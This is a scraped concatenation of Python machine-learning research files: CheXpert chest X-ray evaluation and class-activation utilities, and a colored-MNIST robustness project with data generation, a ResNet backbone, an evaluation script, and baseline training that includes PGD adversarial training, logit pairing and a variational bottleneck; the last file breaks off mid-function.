    # set model to eval mode; required for proper predictions given use of batchnorm
    model.train(False)
    # create dataloader
    dataset = CheXpertDataset(
        path_to_main_folder=PATH_TO_MAIN_FOLDER,
        fold="test",
        transform=data_transforms['valid'],
        uncertainty=UNCERTAINTY)
    dataloader = torch.utils.data.DataLoader(
        dataset, BATCH_SIZE, shuffle=False, num_workers=8)
    # create empty dfs
    pred_df = pd.DataFrame(columns=["Image Index"])
    true_df = pd.DataFrame(columns=["Image Index"])
    # iterate over dataloader
    for i, data in enumerate(dataloader):
        inputs, labels, _ = data
        inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
        true_labels = labels.cpu().data.numpy()
        batch_size = true_labels.shape
        if UNCERTAINTY in ["multiclass", 'weighted_multiclass']:
            # collapse the per-label 3-way (neg/pos/uncertain) outputs into a
            # single positive probability per label
            nn_outputs = model(inputs)
            multiclass_probs = torch.softmax(nn_outputs.view(-1, 3), dim=1)
            outputs = torch.softmax(multiclass_probs[:,[1,2]], dim=1)[:,1].view(-1, N_LABELS)
        else:
            outputs = model(inputs)
        probs = outputs.cpu().data.numpy()
        # get predictions and true values for each item in batch
        for j in range(0, batch_size[0]):
            thisrow = {}
            truerow = {}
            # dataloader is unshuffled, so row index maps back to the dataframe
            thisrow["Image Index"] = dataset.df.index[BATCH_SIZE * i + j]
            truerow["Image Index"] = dataset.df.index[BATCH_SIZE * i + j]
            # iterate over each entry in prediction vector; each corresponds to
            # individual label
            for k in range(len(dataset.PRED_LABEL)):
                thisrow["prob_" + dataset.PRED_LABEL[k]] = probs[j, k]
                truerow[dataset.PRED_LABEL[k]] = true_labels[j, k]
            pred_df = pred_df.append(thisrow, ignore_index=True)
            true_df = true_df.append(truerow, ignore_index=True)
        if(i % 10 == 0):
            # progress: number of images processed so far
            print(str(i * BATCH_SIZE))
    auc_df = pd.DataFrame(columns=["label", "auc"])
    # calc AUCs
    for column in true_df:
        # only score the 14 pathology columns (skip "Image Index")
        if column not in [
                'No Finding',
                'Enlarged Cardiomediastinum',
                'Cardiomegaly',
                'Lung Opacity',
                'Lung Lesion',
                'Edema',
                'Consolidation',
                'Pneumonia',
                'Atelectasis',
                'Pneumothorax',
                'Pleural Effusion',
                'Pleural Other',
                'Fracture',
                'Support Devices']:
            continue
        actual = true_df[column]
        pred = pred_df["prob_" + column]
        thisrow = {}
        thisrow['label'] = column
        thisrow['auc'] = np.nan
        try:
            thisrow['auc'] = sklm.roc_auc_score(
                actual.as_matrix().astype(int), pred.as_matrix())
        except BaseException:
            # AUC is undefined when the test fold has only one class for a label
            print("can't calculate auc for " + str(column))
        auc_df = auc_df.append(thisrow, ignore_index=True)
    # persist results; epoch-suffixed filenames keep per-epoch snapshots apart
    if epoch == 0:
        pred_df.to_csv(os.path.join('results',UNCERTAINTY,'preds.csv'), index=False)
        auc_df.to_csv(os.path.join('results',UNCERTAINTY,'aucs.csv'), index=False)
    else:
        pred_df.to_csv(os.path.join('results',UNCERTAINTY,'preds'+ str(epoch) + '.csv'), index=False)
        auc_df.to_csv(os.path.join('results',UNCERTAINTY,'aucs' + str(epoch) + '.csv'), index=False)
    return pred_df, auc_df
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,815
|
Alaqian/chexpert_old
|
refs/heads/master
|
/camUtils.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 20 21:17:34 2019
@author: Mirac
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms

from chexpertDataset import CheXpertDataset
### CLASS ACTIVATION ####
class HookModel(nn.Module):
    """Wrap a torchvision-style model (features + classifier) and record the
    gradient flowing into the final feature map, for class-activation maps."""
    def __init__(self, model):
        super(HookModel, self).__init__()
        self.gradients = None
        self.features = model.features
        self.classifier = model.classifier

    def activations_hook(self, grad):
        # invoked during backward with d(loss)/d(feature map)
        self.gradients = grad

    def forward(self, x):
        feature_map = self.features(x)
        # capture the gradient of the feature map on the backward pass
        feature_map.register_hook(self.activations_hook)
        pooled = F.relu(feature_map, inplace=True)
        pooled = F.adaptive_avg_pool2d(pooled, (1, 1))
        flat = pooled.view(feature_map.size(0), -1)
        return self.classifier(flat)

    def get_activations_gradient(self):
        return self.gradients

    # method for the activation exctraction
    def get_activations(self, x):
        return self.features(x)
def create_dataloader_cam(PATH_TO_MAIN_FOLDER = "/content", UNCERTAINTY = 'weighted_multiclass'):
    """Build train/valid dataloaders (batch size 1) for CAM visualization.

    Args:
        PATH_TO_MAIN_FOLDER: root folder containing the extracted CheXpert data
        UNCERTAINTY: uncertainty-handling mode forwarded to CheXpertDataset
    Returns:
        dict with 'train' and 'valid' DataLoaders.
    """
    # use imagenet mean,std for normalization
    mean = [0.485, 0.456, 0.406]
    std = [0.229, 0.224, 0.225]
    # FIX: removed the unused local N_LABELS (nothing in this function read it)
    BATCH_SIZE = 1  # CAMs are computed one image at a time
    data_transforms = {
        'train': transforms.Compose([
            transforms.RandomHorizontalFlip(),
            transforms.Scale(224),
            # because scale doesn't always give 224 x 224, this ensures 224 x
            # 224
            transforms.CenterCrop(224),
            transforms.ToTensor(),
            transforms.Normalize(mean, std)
        ]),
        'valid': transforms.Compose([
            transforms.Scale(224),
            transforms.CenterCrop(224),
            transforms.ToTensor(),
            transforms.Normalize(mean, std)
        ]),
    }
    # create train/val dataloaders
    transformed_datasets = {}
    transformed_datasets['train'] = CheXpertDataset(
        path_to_main_folder=PATH_TO_MAIN_FOLDER,
        fold='train',
        transform=data_transforms['train'],
        uncertainty=UNCERTAINTY)
    transformed_datasets['valid'] = CheXpertDataset(
        path_to_main_folder=PATH_TO_MAIN_FOLDER,
        fold='valid',
        transform=data_transforms['valid'],
        uncertainty=UNCERTAINTY)
    dataloaders = {}
    dataloaders['train'] = torch.utils.data.DataLoader(
        transformed_datasets['train'],
        batch_size=BATCH_SIZE,
        shuffle=True,
        num_workers=8)
    dataloaders['valid'] = torch.utils.data.DataLoader(
        transformed_datasets['valid'],
        batch_size=BATCH_SIZE,
        shuffle=True,
        num_workers=8)
    return dataloaders
def rgb2gray(rgb):
    """Convert an RGB array of shape (..., 3) to luminance.

    Uses the ITU-R BT.601 weights (0.2989, 0.5870, 0.1140). Requires
    numpy, which the original module never imported (fixed in the import
    block).
    """
    return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])
|
{"/camUtils.py": ["/chexpertDataset.py"]}
|
27,816
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/gen_color_mnist.py
|
import torchvision
import torch
import numpy as np
import torchvision.transforms as transforms
import tqdm
from torch.autograd import Variable
import argparse
import os
# Where MNIST is downloaded / cached.
data_path = 'datasets/'
parser = argparse.ArgumentParser(description='Generate colored MNIST')
# Hyperparams
parser.add_argument('--cpr', nargs='+', type=float, default=[0.5,0.5],
                    help='color choice is made corresponding to a class with these probability')
args = parser.parse_args()
# Plain tensor conversion only; colorization happens later on whole batches.
trans = ([transforms.ToTensor()])
trans = transforms.Compose(trans)
fulltrainset = torchvision.datasets.MNIST(root=data_path, train=True, download=True, transform=trans)
# shuffle=False keeps image/label order stable across generation runs
trainloader = torch.utils.data.DataLoader(fulltrainset, batch_size=2000, shuffle=False, num_workers=2, pin_memory=True)
test_set = torchvision.datasets.MNIST(root=data_path, train=False, download=True, transform=trans)
testloader = torch.utils.data.DataLoader(test_set, batch_size=2000, shuffle=False, num_workers=2, pin_memory=True)
nb_classes = 10  # MNIST digit classes
# generate color codes
def get_color_codes(cpr):
    """Draw random RGB color codes, one set per entry of ``cpr``.

    Returns an array of shape (len(cpr), nb_classes, 3) where each color
    is scaled so its brightest channel equals 1.
    """
    C = np.random.rand(len(cpr), nb_classes,3)
    C = C/np.max(C, axis=2)[:,:,None]
    # FIX: removed the leftover debug print(C.shape)
    return C
def gen_fgbgcolor_data(loader, img_size=(3,28,28), cpr=[0.5, 0.5], noise=10.):
    """Colorize MNIST batches with class-correlated fore/background colors.

    Args:
        loader: DataLoader yielding (images, targets); images single-channel.
        img_size: shape (C, H, W) of the produced images.
        cpr: probabilities over color sets (must sum to 1), or None to pick
            colors independently of the class (used for the test split).
        noise: scale of the additive gaussian pixel noise.
    Returns:
        (color_data_x, color_data_y): colored images scaled to [0, 1] and labels.
    """
    if cpr is not None:
        assert sum(cpr)==1, '--cpr must be a non-negative list which sums to 1'
        Cfg = get_color_codes(cpr)
        Cbg = get_color_codes(cpr)
    else:
        Cfg = get_color_codes([1])
        Cbg = get_color_codes([1])
    tot_iters = len(loader)
    # BUG FIX: the original called next(iter(loader)) inside the loop, which
    # built a fresh iterator every pass and therefore colorized the FIRST
    # batch tot_iters times. Build the iterator once and advance it.
    batch_iter = iter(loader)
    for i in tqdm.tqdm(range(tot_iters), total=tot_iters):
        x, targets = next(batch_iter)
        assert len(x.size())==4, 'Something is wrong, size of input x should be 4 dimensional (B x C x H x W; perhaps number of channels is degenrate? If so, it should be 1)'
        targets = targets.cpu().numpy()
        bs = targets.shape[0]
        # binarize the digit, then expand to 3 channels at full intensity
        x = (((x*255)>150)*255).type('torch.FloatTensor')
        x_rgb = torch.ones(x.size(0),3, x.size()[2], x.size()[3]).type('torch.FloatTensor')
        x_rgb = x_rgb* x
        x_rgb_fg = 1.*x_rgb
        # foreground color: correlated with the target class when cpr is given
        color_choice = np.argmax(np.random.multinomial(1, cpr, targets.shape[0]), axis=1) if cpr is not None else 0
        c = Cfg[color_choice,targets] if cpr is not None else Cfg[color_choice,np.random.randint(nb_classes, size=targets.shape[0])]
        c = c.reshape(-1, 3, 1, 1)
        c= torch.from_numpy(c).type('torch.FloatTensor')
        x_rgb_fg[:,0] = x_rgb_fg[:,0]* c[:,0]
        x_rgb_fg[:,1] = x_rgb_fg[:,1]* c[:,1]
        x_rgb_fg[:,2] = x_rgb_fg[:,2]* c[:,2]
        bg = (255-x_rgb)
        # background color: drawn with a fresh (independent) color choice
        color_choice = np.argmax(np.random.multinomial(1, cpr, targets.shape[0]), axis=1) if cpr is not None else 0
        c = Cbg[color_choice,targets] if cpr is not None else Cbg[color_choice,np.random.randint(nb_classes, size=targets.shape[0])]
        c = c.reshape(-1, 3, 1, 1)
        c= torch.from_numpy(c).type('torch.FloatTensor')
        bg[:,0] = bg[:,0]* c[:,0]
        bg[:,1] = bg[:,1]* c[:,1]
        bg[:,2] = bg[:,2]* c[:,2]
        x_rgb = x_rgb_fg + bg
        x_rgb = x_rgb + torch.tensor((noise)* np.random.randn(*x_rgb.size())).type('torch.FloatTensor')
        x_rgb = torch.clamp(x_rgb, 0.,255.)
        if i==0:
            # allocate output arrays once the per-batch size is known
            color_data_x = np.zeros((bs* tot_iters, *img_size))
            color_data_y = np.zeros((bs* tot_iters,))
        color_data_x[i*bs: (i+1)*bs] = x_rgb/255.
        color_data_y[i*bs: (i+1)*bs] = targets
    return color_data_x, color_data_y
if __name__ == '__main__':
    # The dataset-generation pipeline is currently disabled; the commented
    # block below writes train/test .npy files under datasets/cmnist/ for
    # the configured --cpr setting.
    # dir_name = data_path + 'cmnist/' + 'fgbg_cmnist_cpr' + '-'.join(str(p) for p in args.cpr) + '/'
    # print(dir_name)
    # if not os.path.exists(data_path + 'cmnist/'):
    #     os.mkdir(data_path + 'cmnist/')
    # if not os.path.exists(dir_name):
    #     os.mkdir(dir_name)
    # color_data_x, color_data_y = gen_fgbgcolor_data(trainloader, img_size=(3,28,28), cpr=args.cpr, noise=10.)
    # np.save(dir_name+ '/train_x.npy', color_data_x)
    # np.save(dir_name+ '/train_y.npy', color_data_y)
    # color_data_x, color_data_y = gen_fgbgcolor_data(testloader, img_size=(3,28,28), cpr=None, noise=10.)
    # np.save(dir_name + 'test_x.npy', color_data_x)
    # np.save(dir_name + 'test_y.npy', color_data_y)
    # Temporary stand-in: a nested tqdm progress-bar demo.
    from tqdm import trange
    from time import sleep
    for i in trange(4, desc='Master'):
        for j in trange(10, desc='nested'):
            sleep(0.1)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,817
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/eval.py
|
from argparse import Namespace
import argparse
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
import tqdm
from data import get_dataset
# Command-line interface, seeding, and data loading for standalone evaluation
# of a checkpoint produced by the training scripts.
parser = argparse.ArgumentParser(description='Predicting with high correlation features')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
                    help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
                    help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
                    help='dir path (inside root_dir) to save the log and the final model')
# dataset
parser.add_argument('--dataset', type=str, default='mnistm',
                    help='dataset name')
# Adaptive BN
parser.add_argument('--bn_eval', action='store_true',
                    help='adapt BN stats during eval')
# hyperparameters
parser.add_argument('--seed', type=int, default=1111,
                    help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
                    help='batch size')
# meta specifications
parser.add_argument('--cuda', action='store_false',
                    help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
# Restrict visible GPUs before any CUDA initialization.
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
use_cuda = torch.cuda.is_available()
# Seed CPU and (if available) CUDA RNGs for reproducibility.
torch.manual_seed(args.seed)
if use_cuda:
    torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
def test(loader, model):
    """Evaluate `model` on every batch of `loader`; return top-1 accuracy (%).

    Reads module globals `args` (for --bn_eval) and `use_cuda`.
    """
    global best_acc, args
    if args.bn_eval: # forward prop data twice to update BN running averages
        model.train()
        for _ in range(2):
            for batch_idx, (inputs, targets) in enumerate(loader):
                if use_cuda:
                    inputs, targets = inputs.cuda(), targets.cuda()
                inputs, targets = Variable(inputs), Variable(targets)
                _ = (model(inputs, train=False))
    model.eval()
    correct, total = 0, 0
    # BUG FIX: the original called next(iter(loader)) inside the loop, which
    # rebuilds the iterator every step — for a non-shuffled test loader that
    # evaluates the SAME first batch repeatedly. Iterate the loader directly.
    # (Also dropped the unused `test_loss` local.)
    for batch_idx, (inputs, targets) in enumerate(tqdm.tqdm(loader, total=len(loader))):
        if use_cuda:
            inputs, targets = inputs.cuda(), targets.cuda()
        with torch.no_grad():
            inputs, targets = Variable(inputs), Variable(targets)
            outputs = (model(inputs, train=False))
            _, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
            total += targets.size(0)
            correct += predicted.eq(targets.data).cpu().sum()
    acc = 100.*float(correct)/float(total)
    return acc
# Load the best checkpoint written by training (a fully pickled model object,
# not just a state_dict) and report test accuracy at the best validation point.
with open(args.save_dir + '/best_model.pt', 'rb') as f:
    best_state = torch.load(f)
    model = best_state['model']
if use_cuda:
    model.cuda()
# Run on test data.
test_acc = test(testloader, model=model)
best_val_acc = test(validloader, model=model)
print('=' * 89)
status = 'Test acc {:3.4f} at best val acc {:3.4f}'.format(test_acc, best_val_acc)
print(status)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,818
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/resnet_base.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class resblock(nn.Module):
    """Pre-activation residual block: BN -> ACT -> conv -> BN -> ACT -> conv + shortcut.

    NOTE(review): `ACT` used in forward() is neither defined nor imported in
    this module — presumably an activation such as F.relu supplied elsewhere;
    confirm before running this file standalone.
    """
    def __init__(self, depth, channels, stride=1, bn='', nresblocks=1.,affine=True, kernel_size=3, bias=True):
        # depth: input channel count; channels: output channel count.
        self.depth = depth
        self. channels = channels
        super(resblock, self).__init__()
        # BN layers collapse to no-ops (empty nn.Sequential) when `bn` is falsy.
        self.bn1 = nn.BatchNorm2d(depth,affine=affine) if bn else nn.Sequential()
        self.conv2 = (nn.Conv2d(depth, channels, kernel_size=kernel_size, stride=stride, padding=1, bias=bias))
        self.bn2 = nn.BatchNorm2d(channels, affine=affine) if bn else nn.Sequential()
        self.conv3 = nn.Conv2d(channels, channels, kernel_size=kernel_size, stride=1, padding=1, bias=bias)
        self.shortcut = nn.Sequential()
        # 1x1 projection shortcut whenever spatial size or channel count changes.
        if stride > 1 or depth!=channels:
            layers = []
            conv_layer = nn.Conv2d(depth, channels, kernel_size=1, stride=stride, padding=0, bias=bias)
            layers += [conv_layer, nn.BatchNorm2d(channels,affine=affine) if bn else nn.Sequential()]
            self.shortcut = nn.Sequential(*layers)
    def forward(self, x):
        # Pre-activation ordering: normalize/activate before each convolution.
        out = ACT(self.bn1(x))
        out = ACT(self.bn2(self.conv2(out)))
        out = (self.conv3(out))
        short = self.shortcut(x)
        out += 1.*short
        return out
class ResNet(nn.Module):
    """Pre-activation ResNet backbone (depth = 6n+2) built from `resblock`s.

    forward() returns a pair (hid, class_feature): the first-conv feature map
    and the output of the last residual stage (no pooling/classifier here).
    NOTE(review): the `ret_hid` parameter of forward() is accepted but unused.
    """
    def __init__(self, depth=56, nb_filters=32, num_classes=10, bn=False, affine=True, kernel_size=3, inp_channels=3, k=1, bias=False, inp_noise=0): # n=9->Resnet-56
        super(ResNet, self).__init__()
        self.inp_noise = inp_noise
        nstage = 3
        self.pre_clf=[]
        assert ((depth-2)%6 ==0), 'resnet depth should be 6n+2'
        n = int((depth-2)/6)
        # Channel widths per stage; k is the widening factor.
        nfilters = [nb_filters, nb_filters*k, 2* nb_filters*k, 4* nb_filters*k, num_classes]
        self.nfilters = nfilters
        self.num_classes = num_classes
        # NOTE: padding=0 here shrinks the spatial size by kernel_size-1.
        self.conv1 = (nn.Conv2d(inp_channels, nfilters[0], kernel_size=kernel_size, stride=1, padding=0, bias=bias))
        self.bn1 = nn.BatchNorm2d(nfilters[0], affine=affine) if bn else nn.Sequential()
        nb_filters_prev = nb_filters_cur = nfilters[0]
        for stage in range(nstage):
            nb_filters_cur = nfilters[stage+1]
            for i in range(n):
                # Downsample (stride 2) only at the first block of stages 1 and 2.
                subsample = 1 if (i > 0 or stage == 0) else 2
                layer = resblock(nb_filters_prev, nb_filters_cur, subsample, bn=bn, nresblocks = nstage*n, affine=affine, kernel_size=3, bias=bias)
                self.pre_clf.append(layer)
                nb_filters_prev = nb_filters_cur
        # Split the flat block list into the three stages.
        self.pre_clf_1 = nn.Sequential(*self.pre_clf[:n])
        self.pre_clf_2 = nn.Sequential(*self.pre_clf[n:2*n])
        self.pre_clf_3 = nn.Sequential(*self.pre_clf[2*n:])
    def forward(self, x, ret_hid=False, train=True):
        if x.size()[1]==1: # if MNIST is given, replicate 1 channel to make input have 3 channel
            # NOTE(review): hard-codes a CUDA tensor type, so 1-channel input
            # requires a GPU — confirm intended.
            out = torch.ones(x.size(0), 3, x.size(2), x.size(3)).type('torch.cuda.FloatTensor')
            out = out*x
        else:
            out = x
        # Optional Gaussian input noise, applied only in training mode.
        if self.inp_noise>0 and train:
            out = out + self.inp_noise*torch.randn_like(out)
        hid = self.conv1(out)
        out = self.bn1(hid)
        out1 = self.pre_clf_1(out)
        out2 = self.pre_clf_2(out1)
        class_feature = self.pre_clf_3(out2)
        return hid,class_feature
# Module is import-only; no standalone entry point.
if __name__ == '__main__':
    pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,819
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/existing_methods.py
|
from argparse import Namespace
import sys
import argparse
import math
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import autograd
import pickle as pkl
from models import ResNet_model, CNN
import torch.nn.functional as F
import glob
import tqdm
import torch.utils.data as utils
import json
from data import get_dataset
from utils import AttackPGD, add_gaussian_noise, pairing_loss
# CLI for the baseline-methods training script: vanilla MLE plus optional
# PGD adversarial training, input noise, ALP/CLP logit pairing, VIB, and
# adaptive BN; dataset/architecture and optimization hyperparameters.
parser = argparse.ArgumentParser(description='Predicting with high correlation features')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
                    help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
                    help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
                    help='dir path (inside root_dir) to save the log and the final model')
parser.add_argument('--load_dir', type=str, default='',
                    help='dir path (inside root_dir) to load model from')
########################
### Baseline methods ###
# Vanilla MLE (simply run without any baseline method argument below)
# Projected gradient descent (PGD) based adversarial training
parser.add_argument('--pgd', action='store_true', help='PGD')
parser.add_argument('--nsteps', type=int, default=20, metavar='N',
                    help='num of steps for PGD')
parser.add_argument('--stepsz', type=int, default=2, metavar='N',
                    help='step size for 1st order adv training')
parser.add_argument('--epsilon', type=float, default=8,
                    help='number of pixel values (0-255) allowed for PGD which is normalized by 255 in the code')
# Input Gaussian noise
parser.add_argument('--inp_noise', type=float, default=0., help='Gaussian input noise with standard deviation specified here')
# Adversarial logit pairing (ALP/CLP)
parser.add_argument('--alp', action='store_true',
                    help='clean logit pairing')
parser.add_argument('--clp', action='store_true',
                    help='clean logit pairing')
parser.add_argument('--beta', type=float, default=0,
                    help='coefficient used for regularization term in ALP/CLP/VIB')
parser.add_argument('--anneal_beta', action='store_true', help='anneal beta from 0.0001 to specified value gradually')
# Variational Information Bottleneck (VIB)
parser.add_argument('--vib', action='store_true',
                    help='use Variational Information Bottleneck')
# Adaptive batch norm
parser.add_argument('--bn_eval', action='store_true',
                    help='adapt BN stats during eval')
### Baseline methods ###
########################
# dataset and architecture
parser.add_argument('--dataset', type=str, default='fgbg_cmnist_cpr0.5-0.5',
                    help='dataset name')
parser.add_argument('--arch', type=str, default='resnet',
                    help='arch name (resnet,cnn)')
parser.add_argument('--depth', type=int, default=56,
                    help='number of resblocks if using resnet architecture')
parser.add_argument('--k', type=int, default=1,
                    help='widening factor for wide resnet architecture')
# Optimization hyper-parameters
parser.add_argument('--seed', type=int, default=1111,
                    help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
                    help='batch size')
parser.add_argument('--bn', action='store_true',
                    help='Use Batch norm')
parser.add_argument('--noaffine', action='store_true',
                    help='no affine transformations')
parser.add_argument('--lr', type=float, default=0.001,
                    help='learning rate ')
parser.add_argument('--epochs', type=int, default=200,
                    help='upper epoch limit')
parser.add_argument('--init', type=str, default="he")
parser.add_argument('--wdecay', type=float, default=0.0001,
                    help='weight decay applied to all weights')
# meta specifications
parser.add_argument('--validation', action='store_true',
                    help='Compute accuracy on validation set at each epoch')
parser.add_argument('--cuda', action='store_false',
                    help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
# Run-directory setup: persist the parsed config and the launch command, pin
# GPUs, seed RNGs, load data, then build or resume the model.
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
if not os.path.exists(args.save_dir):
    os.makedirs(args.save_dir)
log_dir = args.save_dir + '/'
with open(args.save_dir + '/config.txt', 'w') as f:
    json.dump(args.__dict__, f, indent=2)
with open(args.save_dir + '/log.txt', 'w') as f:
    f.write('python ' + ' '.join(s for s in sys.argv) + '\n')
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
# Set the random seed manually for reproducibility.
use_cuda = torch.cuda.is_available()
torch.manual_seed(args.seed)
if use_cuda:
    torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
###############################################################################
# Build the model
###############################################################################
epoch = 0
# Fresh model when --load_dir is empty; otherwise resume the pickled best model.
if args.load_dir=='':
    inp_channels=3
    print('==> Building model..')
    if args.arch == 'resnet':
        model0 = ResNet_model(bn= args.bn, num_classes=nb_classes, depth=args.depth,\
            inp_channels=inp_channels, k=args.k, affine=not args.noaffine, inp_noise=args.inp_noise, VIB=args.vib)
    elif args.arch == 'cnn':
        model0 = CNN(bn= args.bn, affine=not args.noaffine, num_classes=nb_classes, inp_noise=args.inp_noise, VIB=args.vib)
else:
    with open(args.root_dir + '/' + args.load_dir + '/best_model.pt', 'rb') as f:
        best_state = torch.load(f)
        model0 = best_state['model']
        epoch = best_state['epoch']
    print('==> Loading model from epoch ', epoch)
params = list(model0.parameters())
# model wraps model0 for (multi-)GPU execution; checkpoints pickle model0.
model = torch.nn.DataParallel(model0, device_ids=range(len(args.gpu)))
# PGD attack settings; epsilon/step size are given in 0-255 pixel units.
adv_PGD_config = config = {
    'epsilon': args.epsilon / (255),
    'num_steps': args.nsteps,
    'step_size': args.stepsz / (255.),
    'random_start': True
}
AttackPGD_ = AttackPGD(adv_PGD_config)
nb = 0
# He (Kaiming) initialization for conv weights; unit-gamma/zero-beta for BN.
if args.init == 'he':
    for m in model.modules():
        if isinstance(m, nn.Conv2d):
            nb += 1
            # print ('Update init of ', m)
            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
            m.weight.data.normal_(0, math.sqrt(2. / n))
        elif isinstance(m, nn.BatchNorm2d) and not args.noaffine:
            # print ('Update init of ', m)
            m.weight.data.fill_(1)
            m.bias.data.zero_()
print( 'Number of Conv layers: ', (nb))
if use_cuda:
    model.cuda()
total_params = sum(np.prod(x.size()) if len(x.size()) > 1 else x.size()[0] for x in model.parameters())
print('Args:', args)
print( 'Model total parameters:', total_params)
with open(args.save_dir + '/log.txt', 'a') as f:
    f.write(str(args) + ',total_params=' + str(total_params) + '\n')
criterion = nn.CrossEntropyLoss()
def test(loader, model, save=False, epoch=0):
    """Evaluate `model` on `loader`; return top-1 accuracy (%).

    When `save` is True and accuracy beats the global `best_acc`, pickles the
    underlying (non-DataParallel) `model0` plus `epoch` to
    <save_dir>/best_model.pt. Reads module globals `args`, `use_cuda`, `model0`.
    """
    global best_acc, args
    if args.bn_eval: # forward prop data twice to update BN running averages
        model.train()
        for _ in range(2):
            for batch_idx, (inputs, targets) in enumerate(loader):
                if use_cuda:
                    inputs, targets = inputs.cuda(), targets.cuda()
                inputs, targets = Variable(inputs), Variable(targets)
                _ = (model(inputs, train=False))
    model.eval()
    correct, total = 0,0
    # BUG FIX: next(iter(loader)) re-created the iterator each step, so a
    # non-shuffled loader evaluated only its FIRST batch over and over.
    for batch_idx, (inputs, targets) in enumerate(tqdm.tqdm(loader, total=len(loader))):
        if use_cuda:
            inputs, targets = inputs.cuda(), targets.cuda()
        with torch.no_grad():
            inputs, targets = Variable(inputs), Variable(targets)
            outputs = (model(inputs, train=False))
            _, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
            total += targets.size(0)
            correct += predicted.eq(targets.data).cpu().sum()
    # Save checkpoint.
    acc = 100.*float(correct)/float(total)
    if save and acc > best_acc:
        best_acc = acc
        print('Saving best model..')
        state = {
            'model': model0,
            'epoch': epoch
        }
        with open(args.save_dir + '/best_model.pt', 'wb') as f:
            torch.save(state, f)
    return acc
def train(epoch):
    """Run one training epoch with the configured baseline method.

    Returns (mean CE loss, train accuracy %, mean regularization loss).
    Reads module globals: trainloader, optimizer, args, model, criterion,
    AttackPGD_, use_cuda (and pairing_loss for ALP/CLP).
    """
    global trainloader, optimizer, args, model, best_loss
    model.train()
    correct = 0
    total = 0
    total_loss, reg_loss, tot_regularization_loss = 0, 0, 0
    optimizer.zero_grad()
    tot_iters = len(trainloader)
    # BUG FIX: the original called next(iter(trainloader)) every step, which
    # rebuilds the iterator each time and therefore samples batches with
    # replacement instead of sweeping the epoch. Use one persistent iterator.
    data_iter = iter(trainloader)
    for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
        inputs, targets = next(data_iter)
        if use_cuda:
            inputs, targets = inputs.cuda(), targets.cuda()
        inputs = Variable(inputs)
        if args.pgd:
            # PGD adversarial training: loss on perturbed inputs only.
            outputs = AttackPGD_(inputs, targets, model)
            loss = criterion(outputs, targets)
        elif args.alp:
            # Adversarial logit pairing: clean + adversarial CE plus a
            # penalty tying the two sets of logits together.
            outputs_adv = AttackPGD_(inputs, targets, model)
            loss_adv = criterion(outputs_adv, targets)
            outputs = (model(inputs))
            loss_clean = criterion(outputs, targets)
            loss = loss_clean + loss_adv
            reg_loss = pairing_loss(outputs_adv, outputs)
        elif args.clp:
            # Clean logit pairing: pair logits of randomly matched examples.
            outputs = (model(inputs))
            loss_clean = criterion(outputs, targets)
            loss = loss_clean
            reg_loss = pairing_loss(outputs, outputs, stochastic_pairing = True)
        elif args.vib:
            # Variational information bottleneck: CE + KL(q(z|x) || N(0, I)).
            outputs, mn, logvar = model(inputs)
            loss = criterion(outputs, targets)
            reg_loss = -0.5 * torch.sum(1 + logvar - mn.pow(2) - logvar.exp())/inputs.size(0)
        else:
            # Vanilla MLE.
            outputs = (model(inputs))
            loss = criterion(outputs, targets)
        tot_regularization_loss += reg_loss
        total_loss_ = loss + args.beta* reg_loss
        total_loss_.backward() # retain_graph=True
        total_loss += loss.data.cpu()
        _, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
